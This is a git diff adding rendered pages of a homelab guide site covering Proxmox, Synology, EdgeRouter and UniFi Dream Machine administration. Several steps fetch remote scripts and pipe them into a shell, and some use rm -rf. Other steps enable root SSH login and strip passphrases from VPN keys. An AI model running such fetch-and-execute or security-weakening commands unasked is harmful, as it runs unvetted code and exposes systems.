+╰─# bash <( curl -s https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/expand.sh) 1 ↵
+ VMID NAME STATUS MEM( MB) BOOTDISK( GB) PID
+ 100 vm100 running 4096 40 .20 1113
+ 101 test stopped 2048 2 .20 0
+ 9000 ubuntu22-04-cloud stopped 2048 2 .20 0
+Enter the VM ID to be expanded: 101
+Enter the size to be expanded in GB ( example: 10G) : 5G
+VM ID 101 disk storage1 will be expanded by 5G
+Warning: There is currently no way to downsize the disk!
+Are you sure you want to expand the disk? ( yes/no) : yes
+
+Expanding the disk... Size of logical volume storage1/vm-101-disk-0 changed from <2 .20 GiB ( 563 extents) to <7 .20 GiB ( 1843 extents) .
+ Logical volume storage1/vm-101-disk-0 successfully resized.
+GPT:Primary header thinks Alt. header is not at the end of the disk.
+GPT:Alternate GPT header not at the end of the disk.
+GPT: Use GNU Parted to correct GPT errors.
+add map storage1-vm--101--disk--0p1 ( 253 :12) : 0 4384735 linear 253 :11 227328
+add map storage1-vm--101--disk--0p14 ( 253 :13) : 0 8192 linear 253 :11 2048
+add map storage1-vm--101--disk--0p15 ( 253 :14) : 0 217088 linear 253 :11 10240
+Warning: The kernel is still using the old partition table.
+The new table will be used at the next reboot or after you
+run partprobe( 8 ) or kpartx( 8 )
+The operation has completed successfully.
+
Limitations VM must be stopped to expand the disk. Currently supported only "cloud images" (or single ext4 partition installation) but if you still want to resize regular vm with LVM partition table, you need to extend the LVM partition INSIDE the vm AFTER running the script. Resizing LVM is done like this: $ lvm
+
+lvm> lvextend -l +100%FREE /dev/ubuntu-vg/ubuntu-lv
+lvm> exit
+
+$ resize2fs /dev/ubuntu-vg/ubuntu-lv
+
Resize of Ceph disks is currently not supported (PR are welcome!)
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/windows-vm-configuration/index.html b/infrastructure/proxmox/windows-vm-configuration/index.html
new file mode 100644
index 000000000..9b2033abb
--- /dev/null
+++ b/infrastructure/proxmox/windows-vm-configuration/index.html
@@ -0,0 +1,168 @@
+
Windows VM Configuration - 3os Proxmox Windows Virtual Machines VirtIO Proxmox Windows Virtual Machine Configuration This guide will walk you through configuring Windows 10 or Windows 11 Virtual Machines with VirtIO Disks and Networking using Proxmox. This configuration was tested to work with the GPU passthroughs
feature from one of the following guides:
Prerequirements Before we begin, we need to download the VirtIO Drivers for Windows iso
. Upload it via the GUI as any other ISO file.
You can also use SSH and download it directly from the Proxmox server.
wget -P /var/lib/vz/template/iso https://fedorapeople.org/groups/virt/virtio-win/direct-downloads/stable-virtio/virtio-win.iso
+
Create a VM in Proxmox Create a Virtual Machine in Proxmox as usual.
General Select Advanced
options.
OS Choose the iso file image for Windows 10 or 11. Change Type
to Microsoft Windows
and Version
to your Windows version.
System Change the Machine type to q35
, BIOS to UEFI
. Add TPM for Windows 11. Allocate Storage for UEFI BIOS and TPM.
Disks Set Bus/Device to VirtIO Block
and Cache to Write Through
. Select the storage disk and the VM's disk size.
CPU Choose how many cores you want to use. Set The cpu Type to Host
Memory Allocate the memory for the VM. Make sure the Ballooning Device
is enabled.
Network Select your preferred network interface. Set the Model to VirtIO (paravirtualized)
.
Confirm Don't Start the VM after creating it.
Add CD/DVD to VM We will need to use the VirtIO Drivers for Windows iso
file to install the drivers while installing the Windows VM.
Hardware Before Installation This is how the hardware of the VM should look before starting the Windows installation.
Windows Installation The Windows installation process is the same as any other Windows OS installation. The only caveat is that you need to install the drivers for the Storage devices and Network devices.
Choose Custom: Install Windows only (advanced)
Missing Storage Devices When prompted to select the storage device to install windows the device won't show since we are using the VirtIO storage. Select Load Driver
.
Load the VirtIO Drivers Browse to the VirtIO Disk find a folder called viostor
and select the appropriate windows driver.
You should see the a Red Hat VirtIO driver selected. Click Next
and install the driver.
Continue with the installation as usual
Missing Network Driver Windows won't be able to load network drivers while installing. When prompted with something for connecting to the Internet, select I Don't have internet
and skip it. We will deal with the network drivers at post installation.
Post Installation Install all the VirtIO Drivers for Windows Open the VirtIO CD and run the virtio-win-gt-x64.exe
, virtio-win-guest-tools
installer. This will install all the missing virtio drivers for the VM and guest OS tools.
After the installation your Device Manager should look like this without any errors.
Remove the VirtIO CD/DVD and Windows iso Power off the VM.
Remove the added CD/DVD for VirtIO iso.
Select Do not use any media
on the CD/DVD with the Windows iso.
At this point we are done with the installation of the Windows VM.
Follow those guides for utilizing a GPU passthrough to VM:
GPU Passthrough to VM - Full GPU passthrough to VM guide iGPU Passthrough to VM - CPU's GPU passthrough to VM guide (Intel) GPU Split Passthrough - Splitting (Nvidia) to Multiple GPUs passthrough to VM guide
Back to top
\ No newline at end of file
diff --git a/infrastructure/synology/Install-oh-my-zsh/index.html b/infrastructure/synology/Install-oh-my-zsh/index.html
new file mode 100644
index 000000000..5693b0d62
--- /dev/null
+++ b/infrastructure/synology/Install-oh-my-zsh/index.html
@@ -0,0 +1,174 @@
+
oh-my-zsh on Synology NAS - 3os synology oh-my-zsh Authors: fire1ce | Created: 2021-09-01 | Last update: 2022-08-02 How to install oh-my-zsh on Synology NAS Introduction The following steps will instruct you how to install oh-my-zsh on Synology DSM NAS.
What's ZSH Z-shell (Zsh) is a Unix shell that can be used as an interactive login shell and as a shell scripting command interpreter. Zsh is an enhanced Bourne shell with many enhancements, including some Bash, ksh and tcsh features.
What's Oh-My-Zsh Oh My Zsh is an open source, community-driven framework for managing your zsh configuration.
In order to install oh-my-zsh, we need to add 3rd party packages to Synology DSM. Synology Community Packages provides packages for Synology-branded NAS devices.
DSM 6 and below:
Log into your NAS as administrator and go to Main Menu → Package Center → Settings and set Trust Level to Synology Inc. and trusted publishers.
In the Package Sources tab, click Add, type SynoCommunity as Name and https://packages.synocommunity.com/
as Location and then press OK to validate.
Go back to the Package Center and enjoy SynoCommunity's packages in the Community tab.
Install Z shell (with modules)
Install Z shell (with modules)
from package center Community tab.
Install Git
Install Git
from package center Community tab.
Change The Default Shell to ZSH
The following steps will be performed via SSH
edit ~/.profile
the file may be missing, so create it if it doesn't exist.
Append the codes below to the end of the file or add if empty.
if [[ -x /usr/local/bin/zsh ]] ; then
+ export SHELL = /usr/local/bin/zsh
+ exec /usr/local/bin/zsh
+fi
+
Open new SSH session to Synology NAS the shell should be zsh
Install Oh My Zsh From new SSH session with zsh
shell, install Oh My Zsh with the one of following command:
with curl:
sh -c " $( curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh) "
+
with wget:
sh -c " $( wget -O- https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh) "
+
At this point you should have a working oh-my-zsh
working on your Synology NAS.
Back to top
\ No newline at end of file
diff --git a/infrastructure/synology/Installing-vm-tools-on-virtual-machine/index.html b/infrastructure/synology/Installing-vm-tools-on-virtual-machine/index.html
new file mode 100644
index 000000000..373de6329
--- /dev/null
+++ b/infrastructure/synology/Installing-vm-tools-on-virtual-machine/index.html
@@ -0,0 +1,171 @@
+
Install VM Tools on Virtual Machine - 3os synology Authors: fire1ce | Created: 2021-09-01 | Last update: 2022-08-02 On Debian:
sudo add-apt-repository universe
+sudo apt-get install qemu-guest-agent
+
On CentOS 7:
yum install -y qemu-guest-agent
+
On CentOS 8:
dnf install -y qemu-guest-agent
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/synology/auto-dsm-config-backup/index.html b/infrastructure/synology/auto-dsm-config-backup/index.html
new file mode 100644
index 000000000..b7dd14c05
--- /dev/null
+++ b/infrastructure/synology/auto-dsm-config-backup/index.html
@@ -0,0 +1,168 @@
+
Auto DSM Config Backup - 3os synology Authors: fire1ce | Created: 2021-09-01 | Last update: 2022-08-02 Auto DSM Config Backup Since Synology's DSM doesn't provide any auto-backup for its configuration, I've made a simple script that can be run from the "Task Scheduler". The script invokes the synoconfbkp CLI command, which will dump the config file to the provided folder. I use a Dropbox folder in my case (this will sync my files to my Dropbox account). It appends a date and hostname. It also checks the same folder for files older than 60 days and deletes them, so your storage won't be flooded with files older than 2 months. I've scheduled the script to run once a day with the "Task Scheduler"
To use it, create a new task in the Task Scheduler, choose a schedule, and append the script to "Run Command" under "Task Settings"; don't forget to change the destinations.
synoconfbkp export --filepath=/volume1/activeShare/Dropbox/SettingsConfigs/synologyConfigBackup/$(hostname)_$(date +%y%m%d).dss && find /volume1/activeShare/Dropbox/SettingsConfigs/synologyConfigBackup -type f -mtime +60 -exec rm -f {} \;
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/synology/disable-dms-listening-on-80-443-ports/index.html b/infrastructure/synology/disable-dms-listening-on-80-443-ports/index.html
new file mode 100644
index 000000000..b590b7bb0
--- /dev/null
+++ b/infrastructure/synology/disable-dms-listening-on-80-443-ports/index.html
@@ -0,0 +1,179 @@
+
Free 80,443 Ports - 3os synology NAS ports Authors: fire1ce | Created: 2021-08-28 | Last update: 2022-08-05 Free 80,443 Ports On Synology NAS (DSM) Synology NAS (DSM) is a network storage device, with some additional features like native support for virtualization, and docker support. One of the issues is that the default ports 80 and 443 are used by the web server even if you change the default ports of the Synology's DSM to other ports. In some cases, you want to use these ports for other purposes, such as a reverse proxy as an entry point for the web services. The following steps will help you to free the default ports 80 and 443 on the Synology NAS (DSM) for other purposes.
First, you need to configure the Synology NAS (DSM) to listen on ports other than 80, 443.
Login to the Synology NAS (DSM) as administrator user open Control Panel
and find Login Portal
under System
Under DSM
tab, change the DSM port (http) to a different port than 80, and the DSM port (https) to a different port than 443.
Click Save
to save the changes. Then, re-login to the Synology NAS (DSM) with the new port as administrator user as we did above.
Disable the Synology NAS (DSM) to Listen on 80, 443 Ports Synology NAS (DSM) will listen on 80, 443 ports after each reboot. Therefore, the changes will be lost after each reboot. The workaround is to run a script to free the ports 80, 443 each time the Synology NAS (DSM) boots.
The following one liner will free the ports 80, 443 on Nginx web server of the Synology NAS (DSM), until the Synology NAS (DSM) is rebooted. It removes the port 80, 443 from the Nginx
config and restarts the Nginx
service.
In order to persist the changes, we will create a Scheduled Task
to run the above script on each reboot.
Head to Control Panel
and find Task Scheduler
, then click Create
and select Triggered Task
- User-defined script
.
At Create Task
- General
page, fill in the following information:
Task: Disable_DSM_Listening_on_80_443 User: root Event: Boot-up Pre-task: None Enabled: Yes
At Task Settings
tab, under Run command
fill the User-defined script
with the following depending on Synology NAS (DSM) version:
Suggestion: Select the Notification when the task is terminated abnormally.
Click OK
. The new task should be created. You can check the task by clicking Run
in the Task Scheduler
page. Preferred to reboot the Synology NAS (DSM) to make sure the changes are applied at boot.
Back to top
\ No newline at end of file
diff --git a/infrastructure/synology/enable-ssh-root-login/index.html b/infrastructure/synology/enable-ssh-root-login/index.html
new file mode 100644
index 000000000..b1426a6a7
--- /dev/null
+++ b/infrastructure/synology/enable-ssh-root-login/index.html
@@ -0,0 +1,169 @@
+
Enable SSH Root Login - 3os synology ssh Authors: fire1ce | Created: 2023-01-05 | Last update: 2023-01-05 Enable Synology SSH Root Login Synology DSM allows Linux experts to use the SSH terminal. By default you need to log in as a user and then enter "sudo su root", which can be inconvenient, but there is the option of logging in as root directly.
Section First, the DSM Control Panel is called up, and Extended mode must be activated so that the required icon Terminal & SNMP appears. Under Terminal & SNMP the SSH service can simply be enabled.
Connect to Synology DSM with your admin user and password. Change user to root with the command "sudo su" and enter the admin's password. Set the root
user password with the command below:
sudo synouser -setpw root 'new_root_password'
+
Edit the file /etc/ssh/sshd_config
and change the line PermitRootLogin no
to PermitRootLogin yes
.
sudo vi /etc/ssh/sshd_config
+
Reboot the Synology NAS to apply the changes.
Back to top
\ No newline at end of file
diff --git a/infrastructure/synology/ssh-with-rsa-key/index.html b/infrastructure/synology/ssh-with-rsa-key/index.html
new file mode 100644
index 000000000..ff78fcda9
--- /dev/null
+++ b/infrastructure/synology/ssh-with-rsa-key/index.html
@@ -0,0 +1,175 @@
+
SSH With RSA Keys - 3os synology dsm ssh rsa-keys Authors: fire1ce | Created: 2022-04-13 | Last update: 2022-04-24 Synology DSM - Allow Persistent SSH With RSA Keys As a power user, I would like to be able to connect to my Synology DSM via SSH. The issue is that Synology DSM won't allow you to use SSH with RSA keys out of the box and only allows you to use SSH with a password. In order to allow the use of SSH keys we need to perform the following steps:
Requirements I will assume you have already have SSH keys generated, SSH server configured on Synology DSM
Generated SSH keys SSH server configured on Synology DSM Allow User Home
at DSM Level User Home
enable to create a personal home folder for each user, except for guest. This will allow as to create user's .ssh
folder and authorized_keys
file.
Log into Synology web UI as an administrator user Control Panel -> User & Groups -> Advanced, scroll down to "User Home" Check "Enable user home service", select an appropriate Location (i.e. volume1) Click "Apply"
Log in to the NAS through SSH with the user you want to add key authorization for. The following example shows how to add will work for the active user in the SSH session.
First change the permissions of the user's home
folder to 700
Create the .ssh
folder and set permissions to 700
mkdir ~/.ssh && chmod 700 ~/.ssh
+
Create the authorized_keys
file and set permissions to 644
touch ~/.ssh/authorized_keys && chmod 644 ~/.ssh/authorized_keys
+
Synology's DSM SSH server supports RSA and ed25519 keys.
Now you need to copy your public keys to the authorized_keys
file, you can do it manually or use the following command:
echo <public-key-sting> >> ~/.ssh/authorized_keys
+
You can do it automatically by using the following command from a client with the ssh key you want to add:
ssh-copy-id -i ~/.ssh/id_rsa <user@ip-address>
+
At this point you should be able to connect to Synology DSM via SSH using the key you just added.
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/edge-router/index.html b/infrastructure/ubiquiti/edge-router/index.html
new file mode 100644
index 000000000..1d55b102c
--- /dev/null
+++ b/infrastructure/ubiquiti/edge-router/index.html
@@ -0,0 +1,316 @@
+
EdgeRouter - 3os ubiquiti edgerouter Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 EdgeRouter Clear DNS Forwarding Cache via SSH Call ssh user@192.168.1.1 'sudo /opt/vyatta/bin/sudo-users/vyatta-op-dns-forwarding.pl --clear-cache'
+
SSH via RSA keys SSH to the Edge Router: Copy the public key to /tmp folder
Run:
configure
+loadkey [ your user] /tmp/id_rsa.pub
+
Check that the keys are working by opening new session
Disable Password Authentication
set service ssh disable-password-authentication
+commit ; save
+
Done.
Enable Password Authentication if needed.
delete service ssh disable-password-authentication
+
Hardening EdgeRouter This will change the GUI to port 8443, disable old cyphers, Only will listen on internal Network. assuming your EdgeRouter IP is 192.168.1.1, if not change it accordingly.
SSH to the Edge Router
configure
+set service gui listen-address 192 .168.100.1
+set service gui https-port 8443
+set service gui older-ciphers disable
+set service ssh listen-address 192 .168.100.1
+set service ssh protocol-version v2
+set service ubnt-discover disable
+commit ; save
+
Hardware Offloading For Devices: ER-X / ER-X-SFP / EP-R6 Enable hwnat and ipsec offloading.
configure
+
+set system offload hwnat enable
+set system offload ipsec enable
+
+commit ; save
+
Disable hwnat and ipsec offloading.
configure
+
+set system offload hwnat disable
+set system offload ipsec disable
+
+commit ; save
+
For Devices: ER-4 / ER-6P / ERLite-3 / ERPoE-5 / ER-8 / ERPro-8 / EP-R8 / ER-8-XG Enable IPv4/IPv6 and ipsec offloading.
configure
+
+set system offload ipv4 forwarding enable
+set system offload ipv4 gre enable
+set system offload ipv4 pppoe enable
+set system offload ipv4 vlan enable
+
+set system offload ipv6 forwarding enable
+set system offload ipv6 pppoe enable
+set system offload ipv6 vlan enable
+
+set system offload ipsec enable
+
+commit ; save
+
Disable IPv4/IPv6 and ipsec offloading.
configure
+
+set system offload ipv4 forwarding disable
+set system offload ipv4 gre disable
+set system offload ipv4 pppoe disable
+set system offload ipv4 vlan disable
+
+set system offload ipv6 forwarding disable
+set system offload ipv6 pppoe disable
+set system offload ipv6 vlan disable
+
+set system offload ipsec disable
+
+commit ; save
+
Disable, Update /etc/hosts file on EdgeRouter Disable Auto DHCP hosts:
configure
+set service dhcp-server hostfile-update disablecommit
+commit ; save
+
Update the Host File Manually:
configure
+set system static-host-mapping host-name mydomain.com inet 192 .168.1.10
+commit ; save
+
Show DNS Forwarding
configure
+show service dns forwarding
+
Show Hosts Config
Guest Wifi With Ubiquiti EdgeRouter and Unifi Access Points EdgeRouter Configuration From the Dashboard, click Add Interface and select VLAN.
Set up the VLAN ID as you like; for this example we will use ID 1003 and attach it to the physical interface of your LAN. Give it an IP address in the range of a private IP block, but make sure you end it in a /24 to specify the proper subnet (I originally did /32 as I thought it was supposed to be the exact IP address).
Click on the Services tab. Click Add DHCP Server. Set it up similar to the image below.
Click on the DNS tab under services. Click Add Listen interface and select the VLAN interface. Make sure you hit save.
At this point, you should be able to connect to your Guest Network and connect to the Internet. However, you’ll be able to access the EdgeRouter as well as other devices on your LAN. Next thing you have to do is secure the VLAN.
Click on Firewall/NAT and then click on Add Ruleset. This is for packets coming into the router destined for somewhere else (not the router). Set up the default policy for Accept. Click Save.
From the Actions menu next to the Ruleset, click Interfaces.
Select your VLAN interface and the in direction.
Click Rules and then Add New Rule. Click on Basic and name it LAN. Select Drop as the Action.
Click Destination and enter 10.0.1.0/24 or whatever your LAN IP range is. Then click Save. This will drop all packets from the VLAN destined for your LAN. Save.
Repeat 1 and 2 above (name it GUEST_LOCAL). From the Interface, select the VLAN interface and the local direction. However, set up the default policy as Drop.
Add a new rule. Set it to Accept on UDP port 53.
Save. Let's continue to set up the Unifi AP
Unifi Configuration If you want to limit your Guest Users Bandwidth, head over to User Groups and create a new user group called Guest. Enter bandwidth limits that are appropriate for your Internet Speed. I used 6000 down and 2500 up.
Now go to the Wireless Networks section and create a new network called "Guest" or whatever you want to call it.
Make sure it is enabled, give it a WiFi security key, check the "Guest Policy" option, enter the VLAN Id you used previously and choose the Guest User Group. Save!
Done. Test Your New Guest Wifi by connecting to the Guest Wifi and browse to a website.
EdgeRouter OpenVPN Configuration 443/TCP This Guide is based on Original guide form ubnt support with modifications to the VPN port and protocol
For the purpose of this article, it is assumed that the routing and interface configurations are already in place and that reachability has been tested.
ssh to the EdgeRouter
Make sure that the date/time is set correctly on the EdgeRouter.
show date
+Thu Dec 28 14 :35:42 UTC 2017
+
Log in as the root user.
Generate a Diffie-Hellman (DH) key file and place it in the /config/auth directory. This Will take some time...
openssl dhparam -out /config/auth/dh.pem -2 4096
+
Change the current directory.
Generate a root certificate (replace with your desired passphrase).
example:
PEM Passphrase: Country Name: US
State Or Province Name: New York
Locality Name: New York
Organization Name: Ubiquiti
Organizational Unit Name: Support
Common Name: root
Email Address: support@ubnt.com
NOTE: The Common Name needs to be unique for all certificates.
Copy the newly created certificate + key to the /config/auth directory.
cp demoCA/cacert.pem /config/auth
+cp demoCA/private/cakey.pem /config/auth
+
Generate the server certificate.
example:
Country Name: US
State Or Province Name: New York
Locality Name: New York
Organization Name: Ubiquiti
Organizational Unit Name: Support
Common Name: server
Email Address: support@ubnt.com
Sign the server certificate.
if you want to change the certificate expiration day use: export default_days="3650" with the value of days you desire
Move and rename the server certificate + key to the /config/auth directory.
mv newcert.pem /config/auth/server.pem
+mv newkey.pem /config/auth/server.key
+
Generate, sign and move the client1 certificates.
Common Name: client1
./CA.pl -sign
+mv newcert.pem /config/auth/client1.pem
+mv newkey.pem /config/auth/client1.key
+
(Optional) Repeat the process for client2.
Common Name: client2
./CA.pl -sign
+mv newcert.pem /config/auth/client2.pem
+mv newkey.pem /config/auth/client2.key
+
Verify the contents of the /config/auth directory.
You should have those files:
cacert.pem cakey.pem client1.key client1.pem client2.key client2.pem dh.pem server.key server.pem Remove the password from the client + server keys. This allows the clients to connect using only the provided certificate.
openssl rsa -in /config/auth/server.key -out /config/auth/server-no-pass.key
+openssl rsa -in /config/auth/client1.key -out /config/auth/client1-no-pass.key
+openssl rsa -in /config/auth/client2.key -out /config/auth/client2-no-pass.key
+
Overwrite the existing keys with the no-pass versions.
mv /config/auth/server-no-pass.key /config/auth/server.key
+mv /config/auth/client1-no-pass.key /config/auth/client1.key
+mv /config/auth/client2-no-pass.key /config/auth/client2.key
+
Return to operational mode.
Enter configuration mode.
If EdgeRouter's Interface is on port 433, you must change it.
set service gui https-port 8443
+commit ; save
+
Add a firewall rule for the OpenVPN traffic to the local firewall policy.
set firewall name WAN_LOCAL rule 30 action accept
+set firewall name WAN_LOCAL rule 30 description OpenVPN
+set firewall name WAN_LOCAL rule 30 destination port 443
+set firewall name WAN_LOCAL rule 30 protocol tcp
+
Configure the OpenVPN virtual tunnel interface. push-route - the router for vpn connection name-server - default gateway of the route above
set interfaces openvpn vtun0 mode server
+set interfaces openvpn vtun0 server subnet 172 .16.1.0/24
+set interfaces openvpn vtun0 server push-route 192 .168.100.0/24
+set interfaces openvpn vtun0 server name-server 192 .168.100.1
+set interfaces openvpn vtun0 openvpn-option --duplicate-cn
+set interfaces openvpn vtun0 local-port 443
+edit interfaces openvpn vtun0
+set openvpn-option "--push redirect-gateway"
+set protocol tcp-passive
+commit ; save
+
Link the server certificate/keys and DH key to the virtual tunnel interface.
set interfaces openvpn vtun0 tls ca-cert-file /config/auth/cacert.pem
+set interfaces openvpn vtun0 tls cert-file /config/auth/server.pem
+set interfaces openvpn vtun0 tls key-file /config/auth/server.key
+set interfaces openvpn vtun0 tls dh-file /config/auth/dh.pem
+commit ; save
+
Add DNS forwarding to the new vlan vtun0 to get DNS resolving.
Example for client.ovpn Config client
+dev tun
+proto udp
+remote <server-ip or hostname> 443
+float
+resolv-retry infinite
+nobind
+persist-key
+persist-tun
+verb 3
+ca cacert.pem
+cert client1.pem
+key client1.key
+
EdgeRouter Free Up space by Cleaning Old Firmware ssh to the EdgeRouter:
SpeedTest Cli on Edge Router ssh to the Edge Router. installation:
curl -Lo speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py
+chmod +x speedtest-cli
+
run from the same directory:
./speedtest-cli --no-pre-allocate
+
based on https://github.com/sivel/speedtest-cli
Enable NetFlow on EdgeRouter to UNMS The most suitable place to enable NetFlow is your Default gateway router. UNMS supports NetFlow versions 5 and 9. UNMS only records flow data for IP ranges defined below. Whenever UNMS receives any data from a router, the status of NetFlow changes to Active
.
To show interfaces and pick the right interface:\
Example configuration for EdgeRouter:
configure
+set system flow-accounting interface pppoe0
+set system flow-accounting ingress-capture post-dnat
+set system flow-accounting disable-memory-table
+set system flow-accounting netflow server 192 .168.1.10 port 2055
+set system flow-accounting netflow version 9
+set system flow-accounting netflow engine-id 0
+set system flow-accounting netflow enable-egress engine-id 1
+set system flow-accounting netflow timeout expiry-interval 60
+set system flow-accounting netflow timeout flow-generic 60
+set system flow-accounting netflow timeout icmp 60
+set system flow-accounting netflow timeout max-active-life 60
+set system flow-accounting netflow timeout tcp-fin 10
+set system flow-accounting netflow timeout tcp-generic 60
+set system flow-accounting netflow timeout tcp-rst 10
+set system flow-accounting netflow timeout udp 60
+commit
+save
+
10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 100.64.0.0/10
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/udm-dream-machine/cli-commands/index.html b/infrastructure/ubiquiti/udm-dream-machine/cli-commands/index.html
new file mode 100644
index 000000000..c1317d6e3
--- /dev/null
+++ b/infrastructure/ubiquiti/udm-dream-machine/cli-commands/index.html
@@ -0,0 +1,171 @@
+
CLI Commands - 3os udm ubiquiti unifi Authors: fire1ce | Created: 2022-06-25 | Last update: 2022-06-25 UDM CLI Commands List Collection of CLI commands for the Ubiquiti Unifi Dream Machine or Dream Machine Pro.
Common UDM Commands Open shell to unifi podman container (udm pro)
Show Sensors information including: UDM temperature, fan speed, and voltage.
Show ARP Table
Display All Listening Ports on the UDM Device
UDM Commands List Collection of commands for your Unifi Dream Machine or Dream Machine Pro.
Description UDM/UDM-P SSH Command show DHCP leases (to NSname) cat /mnt/data/udapi-config/dnsmasq.lease show version info show system hardware and installed software ubnt-device-info summary show cpu temperature ubnt-systool cputemp show fan speed ubnt-fan-speed show uptime uptime show ip route netstat -rt -n show ppp summary pppstats show current user whoami show log cat /var/log/messages show interface summary ifstat show interfaces ifconfig show other Ubiquiti devices on local LAN segment (ubnt-discovery) ubnt-tools ubnt-discover show config (wireless) cat /mnt/data/udapi-config/unifi packet capture tcpdump shutdown poweroff reload reboot show ipsec sa ipsec statusall factory reset factory-reset.sh show system burnt in MAC address ubnt-tools hwaddr show unifi server logs cat /mnt/data/unifi-os/unifi/logs/server.log show unifi server settings cat /mnt/data/unifi-os/unifi-core/config/settings.yaml show unifi server http logs cat /mnt/data/unifi-os/unifi-core/logs/http.log show unifi server http logs (errors) cat /mnt/data/unifi-os/unifi-core/logs/errors.log show unifi server discovery log cat /mnt/data/unifi-os/unifi-core/logs/discovery.log show unifi system logs cat /mnt/data/unifi-os/unifi-core/logs/system.log Restarts the UnifiOS Web interface /etc/init.d/S95unifios restart show ip arp (show arp) and IPv6 neighbours arp -a OR ip neigh show tunnel interfaces ip tunnel show Show Sensors information sensors Open shell to unifi podman container unifi-os shell tcpdump tcpdump -w
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/index.html b/infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/index.html
new file mode 100644
index 000000000..fa5ad7607
--- /dev/null
+++ b/infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/index.html
@@ -0,0 +1,172 @@
+
Failover Telegram Notifications - 3os udm ubiquiti unifi Authors: fire1ce | Created: 2022-06-25 | Last update: 2022-06-25 UDM WAN Failover Telegram Notifications This script will send a message to a Telegram chat when WAN connection is changed to failover and back to normal.
Github Repository: UDM Failover Telegram Notifications
Changelog 2023-02-22 - Added support for multiple UDM versions 1.x, 2.x and 3.x Persistence on Reboot This script needs to run every time the system is rebooted since the UDM overwrites crons every boot. This can be accomplished with a boot script. Follow this guide: UDM / UDMPro Boot Script
Compatibility Installation curl -s https://raw.githubusercontent.com/fire1ce/UDM-Failover-Telegram-Notifications/main/install.sh | sh
+
Set your Telegram Chat ID and Bot API Key at
$DATA_DIR for 1.x = /mnt/data $DATA_DIR for 2.x and 3.x = /data
$DATA_DIR /UDMP-Failover-Telegram-Notifications/failover-notifications.sh
+
Config Parameters Description telegram_bot_API_Token Telegram Bot API Token telegram_chat_id Chat ID of the Telegram Bot echo_server_ip IP of a server to test what interface is active (Default 1.1.1.1) run_interval Interval to run a failover check (Default 60 seconds)
Uninstall Delete the UDMP-Failover-Telegram-Notifications folder
rm -rf $DATA_DIR /UDMP-Failover-Telegram-Notifications
+
Delete on boot script file
rm -rf $DATA_DIR /on_boot.d/99-failover-telegram-notifications.sh
+
Usage At boot the script will create a cronjob that will run once. This is done to prevent boot blocking.
Manual run to test notifications:
$DATA_DIR /UDMP-Failover-Telegram-Notifications/failover-notifications.sh
+
It's strongly recommended to perform a reboot in order to check the on boot initialization of the notifications
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/udm-dream-machine/persistent-boot-script/index.html b/infrastructure/ubiquiti/udm-dream-machine/persistent-boot-script/index.html
new file mode 100644
index 000000000..9dba9a340
--- /dev/null
+++ b/infrastructure/ubiquiti/udm-dream-machine/persistent-boot-script/index.html
@@ -0,0 +1,168 @@
+
Persistent Boot Script - 3os udm ubiquiti unifi Authors: fire1ce | Created: 2022-06-25 | Last update: 2022-06-25 Persistent On Boot Script When UDM or UDM PRO reboots or the firmware is updated, the custom changes you made will be lost. This script will allow you to initialize your custom changes on every boot or firmware update without losing them.
Github Repository: unifios-utilities - on-boot-script
Features Allows you to run a shell script at S95 anytime your UDM starts / reboots Persists through reboot and firmware updates ! It is able to do this because Ubiquiti caches all debian package installs on the UDM in /data, then re-installs them on reset of unifi-os container. Install You can execute in UDM/Pro/SE and UDR with:
curl -fsL "https://raw.githubusercontent.com/unifi-utilities/unifios-utilities/HEAD/on-boot-script/remote_install.sh" | /bin/sh
+
This is a force to install script so will uninstall any previous version and install on_boot keeping your on boot files.
This will also install CNI Plugins & CNI Bridge scripts. If you are using UDMSE/UDR remember that you must install podman manually because there is no podman.
For manual installation see: The Github Readme
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/index.html b/infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/index.html
new file mode 100644
index 000000000..00fd03e3b
--- /dev/null
+++ b/infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/index.html
@@ -0,0 +1,172 @@
+
Persistent SSH Keys - 3os udm ubiquiti unifi Authors: fire1ce | Created: 2022-06-25 | Last update: 2022-06-25 UDM Persistent SSH Keys UDM will discard any Authorized Keys for SSH every reboot or firmware upgrade. This script will allow you to persist your SSH keys in the UDM and survive reboots.
Github Repository: UDM Persistent SSH Keys
Changelog 2023-02-22 - Fixed support for UDM Pro Firmware 1.x and 2.x and 3.x - Must reinstall the script after upgrade from 1.x to 2.x Persistence on Reboot This script needs to run every time the system is rebooted since the /root/.ssh/authorized_keys overwrites every boot. This can be accomplished with a boot script. Follow this guide: UDM / UDMPro Boot Script
Compatibility Tested on UDM PRO UDM Pro doesn't support ed25519 SSH Keys Installation The script was tested on UDM PRO
(!) Depending on firmware your $DATA_DIR
will be /mnt/data
(Firmware 1.x) or /data
(Firmware 2.x and 3.x)
curl -s https://raw.githubusercontent.com/fire1ce/UDM-Persistent-SSH-Keys/main/install.sh | sh
+
Add your public RSA keys to:
$DATA_DIR /ssh/authorized_keys
+
Uninstall Delete the 99-ssh-keys.sh file
rm -rf $DATA_DIR /on_boot.d/99-ssh-keys.sh
+
Delete your authorized_keys file
rm -rf $DATA_DIR /ssh/authorized_keys
+
Usage At boot the script will read the $DATA_DIR/ssh/authorized_keys file and add the content to UDM's /root/.ssh/authorized_keys
Manual run:
$DATA_DIR /on_boot.d/99-ssh-keys.sh
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/index.html b/infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/index.html
new file mode 100644
